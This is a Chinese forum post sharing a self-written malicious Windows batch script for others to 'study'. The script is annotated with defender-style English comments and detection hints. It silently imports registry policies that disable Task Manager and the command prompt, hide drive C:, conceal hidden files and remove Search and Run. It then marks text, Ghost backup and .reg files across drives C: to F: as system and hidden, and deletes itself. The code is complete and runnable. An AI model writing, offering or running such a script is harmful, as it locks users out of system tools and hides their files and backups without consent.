
[讨论] 本人用批处理写的恶意程序,有兴趣的一起研究

本人用批处理写的恶意程序,有兴趣的一起研究

@echo off
rem Analysis notes, written from a defender's point of view.
rem This script does three things: it assembles a registry import file with echo
rem redirection, imports it silently with regedit, and then sets the system and
rem hidden attributes on files across drives C: to F:. Key paths and value names
rem below are reproduced exactly as posted.
rem Detection: process-creation logging with command lines will show regedit with
rem the silent switch launched from a batch file, and registry auditing will show
rem value writes under the Policies keys listed below.
cls
rem Build 1.txt in the current directory; the first line is the .reg file header.
echo Windows Registry Editor Version 5.00 >1.txt
rem HKLM writes normally require administrative rights; without them the import
rem of these keys is expected to fail silently because of the silent switch.
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows] >>1.txt
echo "checkedvalue"=dword:00000000 >>1.txt
rem Machine-wide system policy key; the value written here is presumably meant to
rem restrict Task Manager.
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system] >>1.txt
echo "disbletaskmgr"=dword:00000001 >>1.txt
rem Per-user policy key; the value written here targets the command prompt.
echo [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\system] >>1.txt
echo "disablecmd"=dword:00000001 >>1.txt
rem Per-user Explorer policies: both values carry a drive bitmask of 4, which in
rem the usual encoding, where A is 1 and B is 2, selects drive C:.
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>1.txt
echo "nodrives"=hex:04000000 >>1.txt
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>1.txt
echo "noviewondrive"=dword:00000004>>1.txt
rem Explorer view settings for the current user; Hidden set to 2 is the setting
rem that stops Explorer from showing hidden files, which conceals the attrib
rem changes made further down.
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] >>1.txt
echo "Hidden"=dword:00000002 >>1.txt
echo "HideFileExt"=dword:00000000 >>1.txt
echo "WebViewBarricade"=dword:00000000 >>1.txt
echo "StartMenuRun"=dword:00000000 >>1.txt
rem Presumably intended to remove Search and Run from the Start menu.
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\polices\explorer] >>1.txt
echo "nofind"=dword:00000001 >>1.txt
echo "NoRun"=dword:00000001 >>1.txt
rem Rename to .reg so regedit accepts the file as an import.
ren 1.txt 1.reg
rem A bare echo only prints the current echo state.
echo
rem The s switch imports without any confirmation dialog, so the user sees nothing.
regedit /s 1.reg
rem Remove the staging file. 1.txt was already renamed above, so only the second
rem del finds a file.
del 1.txt
del 1.reg
rem Write a one-line helper batch file that deletes baimy.bat, presumably the
rem name this script is saved under, to remove the dropper after it has run.
echo del baimy.bat >3d.txt
ren 3d.txt 3d.bat
rem For each listed drive: switch to it, go to its root, and recursively mark
rem text files, Ghost backup images and .reg files as system plus hidden.
rem The files are not deleted; clearing both attributes with attrib makes them
rem visible again once the Explorer settings above are reverted.
for %%i in (c: d: e: f: ) do (%%i
cd\
attrib +s +h *.txt /s
attrib +s +h *.gho /s
attrib +s +h *.reg /s
)
rem Invoked without call, so control passes to the helper and does not return.
3d.bat
